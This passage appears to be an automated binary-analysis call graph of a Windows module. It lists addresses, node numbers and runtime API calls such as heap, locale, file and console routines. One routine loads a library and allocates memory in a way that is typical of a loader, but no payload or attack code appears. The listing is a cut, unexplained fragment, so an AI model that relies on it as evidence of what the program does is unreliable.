18127->18128 18129 7fef9d36bac _calloc_dbg_impl 18127->18129 18130 7fef9d2bd70 _invalid_parameter 17 API calls 18128->18130 18131 7fef9d36ce8 18129->18131 18134 7fef9d36d26 _calloc_dbg_impl 18129->18134 18130->18132 18133 7fef9d2bd70 _invalid_parameter 17 API calls 18131->18133 18132->18068 18133->18132 18134->18132 18135 7fef9d2bd70 _invalid_parameter 17 API calls 18134->18135 18135->18132 18156 7fef9d363e0 18136->18156 18138 7fef9d2fd20 18138->18101 18139->18106 18141 7fef9d37055 18140->18141 18142 7fef9d370ab 18141->18142 18143 7fef9d370e9 18141->18143 18144 7fef9d2bd70 _invalid_parameter 17 API calls 18142->18144 18145 7fef9d3714a 18143->18145 18148 7fef9d37188 _calloc_dbg_impl 18143->18148 18153 7fef9d370df 18144->18153 18146 7fef9d2bd70 _invalid_parameter 17 API calls 18145->18146 18146->18153 18147 7fef9d37287 18149 7fef9d2bd70 _invalid_parameter 17 API calls 18147->18149 18148->18147 18151 7fef9d372c5 18148->18151 18149->18153 18150 7fef9d37338 18152 7fef9d2bd70 _invalid_parameter 17 API calls 18150->18152 18151->18150 18154 7fef9d37376 18151->18154 18152->18153 18153->18122 18154->18153 18155 7fef9d2bd70 _invalid_parameter 17 API calls 18154->18155 18155->18153 18157 7fef9d3640e 18156->18157 18158 7fef9d3648e 18157->18158 18160 7fef9d364cc _calloc_dbg_impl 18157->18160 18159 7fef9d2bd70 _invalid_parameter 17 API calls 18158->18159 18166 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 18159->18166 18161 7fef9d3668e _CrtMemDumpAllObjectsSince 18160->18161 18162 7fef9d3663f 18160->18162 18168 7fef9d35ea0 18161->18168 18163 7fef9d2bd70 _invalid_parameter 17 API calls 18162->18163 18163->18166 18165 7fef9d366b5 _calloc_dbg_impl 18165->18166 18167 7fef9d2bd70 _invalid_parameter 17 API calls 18165->18167 18166->18138 18167->18166 18169 7fef9d35ecf 18168->18169 18170 7fef9d35fae 18169->18170 18171 7fef9d35f6e 18169->18171 18178 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 18169->18178 18173 7fef9d35fcf _CrtMemDumpAllObjectsSince 18170->18173 18174 7fef9d362e1 _CrtMemDumpAllObjectsSince 18170->18174 18172 7fef9d2bd70 _invalid_parameter 17 API calls 18171->18172 18172->18178 18176 7fef9d360a1 MultiByteToWideChar 18173->18176 18173->18178 18175 7fef9d3632f MultiByteToWideChar 18174->18175 18174->18178 18175->18178 18177 7fef9d3610e GetLastError 18176->18177 18176->18178 18177->18178 18180 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 18177->18180 18178->18165 18179 7fef9d36238 MultiByteToWideChar 18179->18178 18180->18178 18180->18179 16474 7fef9d26ff2 16475 7fef9d26ffe 16474->16475 16478 7fef9d2ca00 16475->16478 16477 7fef9d27011 _initterm_e 16479 7fef9d2ca0e 16478->16479 16480 7fef9d2ca23 EncodePointer 16479->16480 16481 7fef9d2ca4b 16479->16481 16480->16479 16481->16477 18650 7fef9d3e2fc 18651 7fef9d3e309 get_int64_arg _get_printf_count_output 18650->18651 18652 7fef9d3e38c 18651->18652 18654 7fef9d3e3e1 18651->18654 18658 7fef9d2bd70 _invalid_parameter 17 API calls 18652->18658 18653 7fef9d3da75 18667 7fef9d3eca1 18653->18667 18671 7fef9d3dbb5 18653->18671 18654->18653 18655 7fef9d3eadf 18654->18655 18656 7fef9d3eec0 25 API calls 18654->18656 18657 7fef9d3ef10 25 API calls 18655->18657 18656->18655 18659 7fef9d3eafd 18657->18659 18670 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18658->18670 18660 7fef9d3eb33 18659->18660 18662 7fef9d3eec0 25 API calls 18659->18662 18661 7fef9d3ec29 18660->18661 18674 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18660->18674 18663 7fef9d3ebda 18661->18663 18664 7fef9d3ef10 25 API calls 18661->18664 18662->18660 18663->18653 18669 7fef9d3eec0 25 API calls 18663->18669 18664->18663 18665 7fef9d23280 __GSHandlerCheck 8 API calls 18666 7fef9d3ed9e 18665->18666 18668 7fef9d2bd70 _invalid_parameter 17 API calls 18667->18668 18667->18670 18668->18670 18669->18653 18670->18665 18673 7fef9d2bd70 _invalid_parameter 17 API calls 18671->18673 18672 7fef9d3f000 wcsxfrm 2 API calls 18672->18674 18673->18670 18674->18663 18674->18672 18675 7fef9d3ee40 25 API calls 18674->18675 18675->18674 18181 7fef9d253fb 18182 7fef9d2541d _realloc_dbg 18181->18182 18184 7fef9d25421 18182->18184 18187 7fef9d26380 18182->18187 18185 7fef9d254de _calloc_dbg_impl _realloc_dbg 18186 7fef9d2c020 _free_base 2 API calls 18185->18186 18186->18184 18188 7fef9d26395 _CrtIsValidPointer 18187->18188 18189 7fef9d26391 18187->18189 18188->18189 18190 7fef9d263b6 HeapValidate 18188->18190 18189->18185 18190->18189 16507 7fef9d235e1 16508 7fef9d235f1 16507->16508 16512 7fef9d235ea 16507->16512 16508->16512 16513 7fef9d212b0 16508->16513 16511 7fef9d212b0 14 API calls 16511->16512 16514 7fef9d212de CoLoadLibrary 16513->16514 16515 7fef9d22f8c 16513->16515 16517 7fef9d22f0f MessageBoxA ExitProcess 16514->16517 16518 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16514->16518 16516 7fef9d23280 __GSHandlerCheck 8 API calls 16515->16516 16519 7fef9d230ff 16516->16519 16518->16515 16520 7fef9d22f73 _calloc_dbg_impl 16518->16520 16519->16511 16519->16512 16521 7fef9d22f83 CoTaskMemFree 16520->16521 16521->16515 18191 7fef9d23fe1 18192 7fef9d23fea SetLastError 18191->18192 16522 7fef9d27de0 16523 7fef9d27ded 16522->16523 16527 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16522->16527 16529 7fef9d2aa40 16523->16529 16525 7fef9d27e0e 16527->16525 16533 7fef9d2d490 16527->16533 16543 7fef9d27ff0 16527->16543 16530 7fef9d2aa57 16529->16530 16531 7fef9d2aa4d 16529->16531 16530->16527 16547 7fef9d29c10 16531->16547 16535 7fef9d2d4b1 16533->16535 16534 7fef9d2d512 16536 7fef9d2bd70 _invalid_parameter 17 API calls 16534->16536 16535->16534 16539 7fef9d2d550 _calloc_dbg_impl 16535->16539 16538 7fef9d2d546 _calloc_dbg_impl 16536->16538 16537 7fef9d2d63e 16541 7fef9d2bd70 _invalid_parameter 17 API calls 16537->16541 16538->16527 16539->16537 16540 7fef9d2d67c _calloc_dbg_impl 16539->16540 16540->16538 16542 7fef9d2bd70 _invalid_parameter 17 API calls 16540->16542 16541->16538 16542->16538 16544 7fef9d28010 16543->16544 16545 7fef9d2800e 16543->16545 16546 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16544->16546 16545->16527 16546->16545 16548 7fef9d29c2a 16547->16548 16557 7fef9d29b10 16548->16557 16550 7fef9d29c34 16561 7fef9d29f20 16550->16561 16552 7fef9d29c51 16554 7fef9d29ecd 16552->16554 16567 7fef9d2a000 16552->16567 16554->16530 16555 7fef9d29ce8 16555->16554 16580 7fef9d29360 LeaveCriticalSection 16555->16580 16558 7fef9d29b19 16557->16558 16559 7fef9d29bde 16558->16559 16581 7fef9d29360 LeaveCriticalSection 16558->16581 16559->16550 16562 7fef9d29f49 16561->16562 16563 7fef9d29f81 16562->16563 16564 7fef9d29f5b GetOEMCP 16562->16564 16565 7fef9d29f88 GetACP 16563->16565 16566 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16563->16566 16564->16566 16565->16566 16566->16552 16568 7fef9d29f20 __initmbctable 2 API calls 16567->16568 16569 7fef9d2a028 16568->16569 16570 7fef9d2a234 16569->16570 16571 7fef9d2a08e __initmbctable 16569->16571 16576 7fef9d2a039 __initmbctable 16569->16576 16574 7fef9d2a25d IsValidCodePage 16570->16574 16570->16576 16582 7fef9d2a5e0 GetCPInfo 16571->16582 16572 7fef9d23280 __GSHandlerCheck 8 API calls 16573 7fef9d2a470 16572->16573 16573->16555 16575 7fef9d2a27b GetCPInfo 16574->16575 16574->16576 16575->16576 16579 7fef9d2a295 __initmbctable 16575->16579 16576->16572 16578 7fef9d2a5e0 __initmbctable 19 API calls 16578->16576 16579->16578 16580->16554 16581->16559 16585 7fef9d2a61f 16582->16585 16591 7fef9d2a7dc 16582->16591 16583 7fef9d23280 __GSHandlerCheck 8 API calls 16584 7fef9d2aa30 16583->16584 16584->16576 16586 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16585->16586 16587 7fef9d2a734 16586->16587 16593 7fef9d2ef00 16587->16593 16589 7fef9d2a788 16590 7fef9d2ef00 __initmbctable 7 API calls 16589->16590 16590->16591 16591->16583 16592 7fef9d2a80a 16591->16592 16592->16576 16594 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16593->16594 16597 7fef9d2efb0 16594->16597 16596 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16596->16589 16598 7fef9d2efd4 __initmbctable 16597->16598 16599 7fef9d2f068 MultiByteToWideChar 16598->16599 16600 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16599->16600 16604 7fef9d2f0ac malloc _MarkAllocaS 16599->16604 16600->16596 16601 7fef9d2f122 MultiByteToWideChar 16601->16600 16602 7fef9d2f164 LCMapStringW 16601->16602 16602->16600 16603 7fef9d2f1a8 16602->16603 16605 7fef9d2f1b8 16603->16605 16611 7fef9d2f222 malloc _MarkAllocaS 16603->16611 16604->16600 16604->16601 16605->16600 16606 7fef9d2f1d9 LCMapStringW 16605->16606 16606->16600 16607 7fef9d2f2ac LCMapStringW 16607->16600 16608 7fef9d2f2ea 16607->16608 16609 7fef9d2f341 WideCharToMultiByte 16608->16609 16610 7fef9d2f2f4 WideCharToMultiByte 16608->16610 16609->16600 16610->16600 16611->16600 16611->16607 18687 7fef9d312e3 LoadLibraryW 18688 7fef9d31304 GetProcAddress 18687->18688 18689 7fef9d312fd 18687->18689 18688->18689 18690 7fef9d3132a 7 API calls 18688->18690 18691 7fef9d23280 __GSHandlerCheck 8 API calls 18689->18691 18692 7fef9d313b3 GetProcAddress EncodePointer 18690->18692 18693 7fef9d313d5 18690->18693 18694 7fef9d3157a 18691->18694 18692->18693 18695 7fef9d313f9 DecodePointer DecodePointer 18693->18695 18697 7fef9d31428 DecodePointer 18693->18697 18695->18697 18697->18689 17592 7fef9d344e5 17596 7fef9d3445a __SehTransFilter 17592->17596 17593 7fef9d347d7 17594 7fef9d3485b 17593->17594 17595 7fef9d2cf80 _inconsistency 36 API calls 17593->17595 17595->17594 17597 7fef9d3466c __SehTransFilter 17596->17597 17604 7fef9d35180 17596->17604 17597->17593 17611 7fef9d35bb0 17597->17611 17600 7fef9d34727 17600->17593 17601 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17600->17601 17602 7fef9d34767 17601->17602 17617 7fef9d2edc0 RtlUnwindEx 17602->17617 17605 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17604->17605 17606 7fef9d351c1 17605->17606 17607 7fef9d351f0 __SehTransFilter 17606->17607 17620 7fef9d35970 17606->17620 17609 7fef9d2edc0 __SehTransFilter 9 API calls 17607->17609 17610 7fef9d35259 17609->17610 17610->17596 17612 7fef9d35bc6 17611->17612 17613 7fef9d35bc8 17611->17613 17615 7fef9d2cf50 terminate 35 API calls 17612->17615 17616 7fef9d35bda __SehTransFilter 17612->17616 17614 7fef9d2cf80 _inconsistency 36 API calls 17613->17614 17614->17612 17615->17616 17616->17600 17618 7fef9d23280 __GSHandlerCheck 8 API calls 17617->17618 17619 7fef9d2eee7 17618->17619 17619->17593 17621 7fef9d35998 17620->17621 17624 7fef9d355f0 17621->17624 17623 7fef9d359d3 __SehTransFilter __AdjustPointer 17623->17607 17625 7fef9d3561e __SehTransFilter 17624->17625 17626 7fef9d35765 17625->17626 17627 7fef9d356fa _ValidateRead 17625->17627 17635 7fef9d356aa __SehTransFilter __AdjustPointer 17625->17635 17629 7fef9d3577a _ValidateRead 17626->17629 17630 7fef9d35813 __SehTransFilter 17626->17630 17628 7fef9d2cf80 _inconsistency 36 API calls 17627->17628 17627->17635 17628->17635 17631 7fef9d2cf80 _inconsistency 36 API calls 17629->17631 17629->17635 17632 7fef9d3584d _ValidateRead 17630->17632 17636 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17630->17636 17631->17635 17633 7fef9d2cf80 _inconsistency 36 API calls 17632->17633 17632->17635 17633->17635 17634 7fef9d2cf80 _inconsistency 36 API calls 17634->17635 17635->17623 17636->17634 17636->17635 18193 7fef9d3bfde 18202 7fef9d3c00c 18193->18202 18194 7fef9d3b99c 18195 7fef9d3cc93 18194->18195 18200 7fef9d3bada 18194->18200 18196 7fef9d2bd70 _invalid_parameter 17 API calls 18195->18196 18199 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18195->18199 18196->18199 18197 7fef9d3b530 wctomb_s 19 API calls 18197->18202 18198 7fef9d23280 __GSHandlerCheck 8 API calls 18201 7fef9d3cd90 18198->18201 18199->18198 18203 7fef9d2bd70 _invalid_parameter 17 API calls 18200->18203 18202->18194 18202->18197 18203->18199 17029 7fef9d35de0 17034 7fef9d23170 17029->17034 17031 7fef9d35e86 17035 7fef9d231ac 17034->17035 17036 7fef9d23280 __GSHandlerCheck 8 API calls 17035->17036 17037 7fef9d23263 17036->17037 17037->17031 17038 7fef9d23870 17037->17038 17039 7fef9d239db __SehTransFilter 17038->17039 17040 7fef9d238de __SehTransFilter 17038->17040 17039->17031 17040->17039 17041 7fef9d23a71 RtlUnwindEx 17040->17041 17041->17039 17042 7fef9d3ade0 17047 7fef9d3fee0 17042->17047 17045 7fef9d3adf9 17057 7fef9d3ff00 17047->17057 17049 7fef9d3ade9 17049->17045 17050 7fef9d3fc70 17049->17050 17056 7fef9d3fc86 17050->17056 17051 7fef9d3fd59 17128 7fef9d29360 LeaveCriticalSection 17051->17128 17053 7fef9d3fd63 17053->17045 17055 7fef9d3fd09 DeleteCriticalSection 17055->17056 17056->17051 17056->17055 17117 7fef9d40580 17056->17117 17058 7fef9d3ff22 17057->17058 17059 7fef9d40042 17058->17059 17060 7fef9d3ff47 17058->17060 17090 7fef9d29360 LeaveCriticalSection 17059->17090 17061 7fef9d4003d 17060->17061 17072 7fef9d3ae90 17060->17072 17061->17049 17063 7fef9d4004c 17063->17049 17065 7fef9d3ff97 17066 7fef9d3ffd0 17065->17066 17068 7fef9d3ffe1 17065->17068 17069 7fef9d3ffbb 17065->17069 17085 7fef9d3af60 17066->17085 17068->17066 17071 7fef9d3fd70 _fflush_nolock 25 API calls 17068->17071 17075 7fef9d3fd70 17069->17075 17071->17066 17073 7fef9d3aec8 EnterCriticalSection 17072->17073 17074 7fef9d3aea4 17072->17074 17073->17074 17074->17065 17076 7fef9d3fd81 17075->17076 17077 7fef9d3fd8a 17075->17077 17078 7fef9d3ff00 _fflush_nolock 25 API calls 17076->17078 17091 7fef9d3fdf0 17077->17091 17084 7fef9d3fd88 17078->17084 17080 7fef9d3fd94 17080->17084 17095 7fef9d3afb0 17080->17095 17084->17066 17086 7fef9d3af74 17085->17086 17087 7fef9d3af98 LeaveCriticalSection 17085->17087 17116 7fef9d29360 LeaveCriticalSection 17086->17116 17088 7fef9d3af96 17087->17088 17088->17061 17090->17063 17092 7fef9d3fe1f 17091->17092 17094 7fef9d3fe5d 17091->17094 17093 7fef9d3afb0 _fflush_nolock 17 API calls 17092->17093 17092->17094 17093->17094 17094->17080 17097 7fef9d3afc1 17095->17097 17096 7fef9d3b04b 17099 7fef9d407c0 17096->17099 17097->17096 17098 7fef9d2bd70 _invalid_parameter 17 API calls 17097->17098 17098->17096 17100 7fef9d407d3 17099->17100 17101 7fef9d407e8 17099->17101 17100->17084 17102 7fef9d40851 17101->17102 17108 7fef9d4088f 17101->17108 17103 7fef9d2bd70 _invalid_parameter 17 API calls 17102->17103 17103->17100 17104 7fef9d40913 17109 7fef9d2bd70 _invalid_parameter 17 API calls 17104->17109 17105 7fef9d40951 17106 7fef9d3fae0 _fflush_nolock 3 API calls 17105->17106 17107 7fef9d4095a 17106->17107 17110 7fef9d3f900 _fflush_nolock 17 API calls 17107->17110 17114 7fef9d409ab __doserrno 17107->17114 17108->17104 17108->17105 17109->17100 17111 7fef9d40992 FlushFileBuffers 17110->17111 17112 7fef9d4099f GetLastError 17111->17112 17111->17114 17112->17114 17115 7fef9d3fbc0 LeaveCriticalSection 17114->17115 17115->17100 17116->17088 17118 7fef9d40599 17117->17118 17119 7fef9d405ef 17118->17119 17120 7fef9d4062a 17118->17120 17123 7fef9d2bd70 _invalid_parameter 17 API calls 17119->17123 17125 7fef9d40623 17120->17125 17129 7fef9d3ae10 17120->17129 17122 7fef9d40651 17133 7fef9d40680 17122->17133 17123->17125 17125->17056 17126 7fef9d4065c 17144 7fef9d3aee0 17126->17144 17128->17053 17130 7fef9d3ae77 EnterCriticalSection 17129->17130 17131 7fef9d3ae27 17129->17131 17132 7fef9d3ae3b 17130->17132 17131->17130 17131->17132 17132->17122 17134 7fef9d40699 17133->17134 17135 7fef9d406ef 17134->17135 17136 7fef9d4072d 17134->17136 17140 7fef9d2bd70 _invalid_parameter 17 API calls 17135->17140 17137 7fef9d40723 17136->17137 17138 7fef9d3fdf0 _fflush_nolock 17 API calls 17136->17138 17137->17126 17139 7fef9d40752 17138->17139 17141 7fef9d3afb0 _fflush_nolock 17 API calls 17139->17141 17140->17137 17142 7fef9d4076a 17141->17142 17150 7fef9d40a20 17142->17150 17145 7fef9d3af47 LeaveCriticalSection 17144->17145 17146 7fef9d3aef7 17144->17146 17148 7fef9d3af45 17145->17148 17146->17145 17147 7fef9d3af0b 17146->17147 17186 7fef9d29360 LeaveCriticalSection 17147->17186 17148->17125 17151 7fef9d40a53 17150->17151 17157 7fef9d40a33 __doserrno 17150->17157 17152 7fef9d40abc __doserrno 17151->17152 17153 7fef9d40b05 17151->17153 17155 7fef9d2bd70 _invalid_parameter 17 API calls 17152->17155 17154 7fef9d40bd2 17153->17154 17159 7fef9d40b89 __doserrno 17153->17159 17156 7fef9d3fae0 _fflush_nolock 3 API calls 17154->17156 17155->17157 17158 7fef9d40bdb 17156->17158 17157->17137 17162 7fef9d40c13 17158->17162 17164 7fef9d40c80 17158->17164 17161 7fef9d2bd70 _invalid_parameter 17 API calls 17159->17161 17161->17157 17177 7fef9d3fbc0 LeaveCriticalSection 17162->17177 17165 7fef9d3f900 _fflush_nolock 17 API calls 17164->17165 17168 7fef9d40c91 17165->17168 17166 7fef9d40d05 17178 7fef9d3f7d0 17166->17178 17168->17166 17169 7fef9d40ce5 17168->17169 17170 7fef9d3f900 _fflush_nolock 17 API calls 17168->17170 17169->17166 17171 7fef9d3f900 _fflush_nolock 17 API calls 17169->17171 17172 7fef9d40cd6 17170->17172 17173 7fef9d40cf8 CloseHandle 17171->17173 17174 7fef9d3f900 _fflush_nolock 17 API calls 17172->17174 17173->17166 17175 7fef9d40d0f GetLastError 17173->17175 17174->17169 17175->17166 17176 7fef9d40d22 _dosmaperr 17176->17162 17177->17157 17179 7fef9d3f7e3 17178->17179 17180 7fef9d3f878 __doserrno 17178->17180 17179->17180 17181 7fef9d3f87a SetStdHandle 17179->17181 17182 7fef9d3f86a 17179->17182 17180->17176 17181->17180 17183 7fef9d3f871 17182->17183 17184 7fef9d3f889 SetStdHandle 17182->17184 17183->17180 17185 7fef9d3f898 SetStdHandle 17183->17185 17184->17180 17185->17180 17186->17148 17637 7fef9d348e0 17638 7fef9d348f7 std::bad_exception::~bad_exception 17637->17638 17639 7fef9d3490c 17638->17639 17641 7fef9d3d710 17638->17641 17642 7fef9d3d721 17641->17642 17643 7fef9d3d726 17641->17643 17642->17639 17645 7fef9d29360 LeaveCriticalSection 17643->17645 17645->17642 18725 7fef9d27ae3 18728 7fef9d27af3 18725->18728 18726 7fef9d27ce0 SetHandleCount 18727 7fef9d27c74 18726->18727 18728->18726 18729 7fef9d27b95 GetStdHandle 18728->18729 18730 7fef9d27c7b 18728->18730 18729->18730 18731 7fef9d27bb9 18729->18731 18730->18726 18731->18730 18732 7fef9d27bc8 GetFileType 18731->18732 18732->18730 18733 7fef9d27beb InitializeCriticalSectionAndSpinCount 18732->18733 18733->18727 18733->18730 17646 7fef9d314e1 17647 7fef9d314ef DecodePointer 17646->17647 17648 7fef9d31520 DecodePointer 17646->17648 17647->17648 17649 7fef9d3150f 17647->17649 17650 7fef9d31540 17648->17650 17649->17648 17651 7fef9d23280 __GSHandlerCheck 8 API calls 17650->17651 17652 7fef9d3157a 17651->17652 18210 7fef9d2a7e9 18211 7fef9d2a7f9 18210->18211 18212 7fef9d23280 __GSHandlerCheck 8 API calls 18211->18212 18213 7fef9d2a80a 18211->18213 18214 7fef9d2aa30 18212->18214 18215 7fef9d2c7e9 18216 7fef9d2c90c EncodePointer EncodePointer 18215->18216 18218 7fef9d2c80d 18215->18218 18217 7fef9d2c8ca 18216->18217 18221 7fef9d2c872 18218->18221 18224 7fef9d24a00 18218->18224 18220 7fef9d24a00 _realloc_dbg 30 API calls 18222 7fef9d2c8bd 18220->18222 18221->18217 18221->18220 18223 7fef9d2c8ce EncodePointer 18221->18223 18222->18217 18222->18223 18223->18216 18225 7fef9d24a22 18224->18225 18230 7fef9d24a70 18225->18230 18227 7fef9d24a4c 18241 7fef9d29360 LeaveCriticalSection 18227->18241 18229 7fef9d24a5b 18229->18221 18232 7fef9d24ad4 _realloc_dbg 18230->18232 18233 7fef9d24aae _calloc_dbg_impl 18230->18233 18231 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18238 7fef9d24e2c 18231->18238 18232->18231 18232->18233 18233->18227 18234 7fef9d24f90 18257 7fef9d2ba60 18234->18257 18235 7fef9d24f64 18242 7fef9d2bc30 18235->18242 18238->18233 18238->18234 18238->18235 18239 7fef9d24fa6 18239->18233 18240 7fef9d24fba HeapSize 18239->18240 18240->18233 18241->18229 18243 7fef9d2bc50 18242->18243 18244 7fef9d2bc5f 18242->18244 18268 7fef9d2abf0 18243->18268 18246 7fef9d2bc67 18244->18246 18248 7fef9d2bc78 18244->18248 18247 7fef9d2c020 _free_base 2 API calls 18246->18247 18252 7fef9d2bc5a _get_errno_from_oserr 18247->18252 18249 7fef9d2bcba 18248->18249 18250 7fef9d2bc9a HeapReAlloc 18248->18250 18253 7fef9d2bce4 18248->18253 18255 7fef9d2abb0 _callnewh DecodePointer 18248->18255 18256 7fef9d2bd1f GetLastError 18248->18256 18251 7fef9d2abb0 _callnewh DecodePointer 18249->18251 18250->18248 18251->18252 18252->18233 18253->18252 18254 7fef9d2bcee GetLastError 18253->18254 18254->18252 18255->18248 18256->18252 18258 7fef9d2ba76 18257->18258 18259 7fef9d2bacc 18258->18259 18260 7fef9d2bb07 18258->18260 18263 7fef9d2bd70 _invalid_parameter 17 API calls 18259->18263 18261 7fef9d2bb32 HeapSize HeapReAlloc 18260->18261 18265 7fef9d2bb00 _get_errno_from_oserr 18260->18265 18262 7fef9d2bb74 18261->18262 18261->18265 18264 7fef9d2bba0 GetLastError 18262->18264 18274 7fef9d2bbd0 HeapQueryInformation 18262->18274 18263->18265 18264->18265 18265->18239 18269 7fef9d2ac4d 18268->18269 18271 7fef9d2ac0a 18268->18271 18270 7fef9d2abb0 _callnewh DecodePointer 18269->18270 18272 7fef9d2ac21 18270->18272 18271->18272 18273 7fef9d2abb0 _callnewh DecodePointer 18271->18273 18272->18252 18273->18271 18275 7fef9d2bb90 18274->18275 18275->18264 18275->18265 18739 7fef9d39aeb 18740 7fef9d39b2c 18739->18740 18741 7fef9d39b18 18739->18741 18742 7fef9d3ab10 17 API calls 18740->18742 18743 7fef9d39520 19 API calls 18741->18743 18746 7fef9d39b38 18742->18746 18743->18740 18744 7fef9d39c04 18745 7fef9d3a1cb 18744->18745 18749 7fef9d39c23 GetConsoleCP 18744->18749 18747 7fef9d3a205 18745->18747 18748 7fef9d3a8ad WriteFile 18745->18748 18746->18744 18753 7fef9d39bae GetConsoleMode 18746->18753 18750 7fef9d3a400 18747->18750 18751 7fef9d3a21a 18747->18751 18752 7fef9d3a923 GetLastError 18748->18752 18772 7fef9d39dd9 _dosmaperr __doserrno 18748->18772 18775 7fef9d39c4d 18749->18775 18767 7fef9d3a40e 18750->18767 18773 7fef9d3a5f3 18750->18773 18754 7fef9d3a33e WriteFile 18751->18754 18751->18772 18752->18772 18753->18744 18754->18751 18758 7fef9d3a3ea GetLastError 18754->18758 18755 7fef9d23280 __GSHandlerCheck 8 API calls 18760 7fef9d3a9f5 18755->18760 18756 7fef9d39f66 WideCharToMultiByte 18761 7fef9d39fbf WriteFile 18756->18761 18756->18772 18757 7fef9d3a726 WideCharToMultiByte 18762 7fef9d3a791 GetLastError 18757->18762 18757->18773 18758->18772 18759 7fef9d3a531 WriteFile 18763 7fef9d3a5dd GetLastError 18759->18763 18759->18767 18764 7fef9d3a050 GetLastError 18761->18764 18761->18775 18762->18772 18763->18772 18764->18772 18765 7fef9d3a7b0 WriteFile 18768 7fef9d3a857 GetLastError 18765->18768 18765->18773 18766 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18766->18775 18767->18759 18767->18772 18768->18773 18769 7fef9d3a158 GetLastError 18769->18772 18770 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18770->18775 18771 7fef9d3a06d WriteFile 18774 7fef9d3a103 GetLastError 18771->18774 18771->18775 18772->18755 18773->18757 18773->18765 18773->18772 18774->18772 18775->18756 18775->18766 18775->18769 18775->18770 18775->18771 18775->18772 18776 7fef9d3a1b5 GetLastError 18775->18776 18776->18772 17653 7fef9d270e6 17654 7fef9d27090 _exit 33 API calls 17653->17654 17655 7fef9d270f0 17654->17655 17205 7fef9d291ea 17206 7fef9d291ef 17205->17206 17207 7fef9d274e0 __crtExitProcess 3 API calls 17206->17207 17208 7fef9d29203 17207->17208 17209 7fef9d375e9 17212 7fef9d375fb 17209->17212 17214 7fef9d375f4 17209->17214 17210 7fef9d23280 __GSHandlerCheck 8 API calls 17211 7fef9d37d85 17210->17211 17213 7fef9d2bd70 _invalid_parameter 17 API calls 17212->17213 17213->17214 17214->17210 17666 7fef9d2d0ea 17667 7fef9d2d0ef 17666->17667 17668 7fef9d27090 _exit 33 API calls 17667->17668 17669 7fef9d2d209 17667->17669 17673 7fef9d2d0fc 17667->17673 17668->17669 17671 7fef9d2d289 17669->17671 17674 7fef9d23d00 RtlEncodePointer 17669->17674 17671->17673 17675 7fef9d29360 LeaveCriticalSection 17671->17675 17674->17671 17675->17673 17215 7fef9d25991 17216 7fef9d25996 _calloc_dbg_impl 17215->17216 17219 7fef9d2c020 17216->17219 17218 7fef9d259d5 17220 7fef9d2c039 _get_errno_from_oserr 17219->17220 17221 7fef9d2c03b HeapFree 17219->17221 17220->17218 17221->17220 17222 7fef9d2c05a GetLastError 17221->17222 17222->17220 17223 7fef9d2c990 17227 7fef9d24980 17223->17227 17225 7fef9d2c9b8 EncodePointer 17226 7fef9d2c9e5 17225->17226 17228 7fef9d249cb _calloc_dbg_impl 17227->17228 17228->17225 18276 7fef9d35393 18277 7fef9d353a0 18276->18277 18278 7fef9d353b4 __SehTransFilter 18277->18278 18279 7fef9d353cc 18277->18279 18285 7fef9d354a0 RaiseException 18278->18285 18286 7fef9d354a0 RaiseException 18279->18286 18282 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18284 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18282->18284 18283 7fef9d353ca 18283->18282 18285->18283 18286->18283 18804 7fef9d34a95 18806 7fef9d34aad __SehTransFilter 18804->18806 18805 7fef9d34c2b 18806->18805 18807 7fef9d35180 __SehTransFilter 38 API calls 18806->18807 18807->18805 18808 7fef9d32695 18810 7fef9d326a0 18808->18810 18809 7fef9d326ab 18810->18809 18811 7fef9d2bd70 _invalid_parameter 17 API calls 18810->18811 18811->18809 16482 7fef9d23599 16485 7fef9d28900 16482->16485 16484 7fef9d2359e 16486 7fef9d28920 16485->16486 16487 7fef9d28936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16485->16487 16486->16484 16488 7fef9d289de 16487->16488 16488->16486 16489 7fef9d24399 16490 7fef9d243a6 16489->16490 16492 7fef9d24377 16489->16492 16492->16489 16492->16490 16493 7fef9d2abb0 DecodePointer 16492->16493 16494 7fef9d2abd3 16493->16494 16494->16492 17687 7fef9d2c080 HeapValidate 17688 7fef9d2c0a2 17687->17688 17247 7fef9d3b580 17248 7fef9d3b5fa 17247->17248 17249 7fef9d3b6cb 17248->17249 17250 7fef9d3b676 17248->17250 17251 7fef9d3afb0 _fflush_nolock 17 API calls 17249->17251 17254 7fef9d3b6fe 17249->17254 17252 7fef9d2bd70 _invalid_parameter 17 API calls 17250->17252 17251->17254 17258 7fef9d3b6aa _LocaleUpdate::~_LocaleUpdate 17252->17258 17253 7fef9d3b84d 17255 7fef9d2bd70 _invalid_parameter 17 API calls 17253->17255 17254->17253 17256 7fef9d3b8a2 17254->17256 17255->17258 17257 7fef9d3b915 17256->17257 17263 7fef9d3b96a 17256->17263 17261 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17261 17259 7fef9d23280 __GSHandlerCheck 8 API calls 17258->17259 17260 7fef9d3cd90 17259->17260 17261->17258 17262 7fef9d3cc93 17262->17258 17264 7fef9d2bd70 _invalid_parameter 17 API calls 17262->17264 17263->17262 17265 7fef9d3bada 17263->17265 17264->17258 17266 7fef9d2bd70 _invalid_parameter 17 API calls 17265->17266 17266->17258 18291 7fef9d3df8d 18293 7fef9d3dfbb 18291->18293 18292 7fef9d3eadf 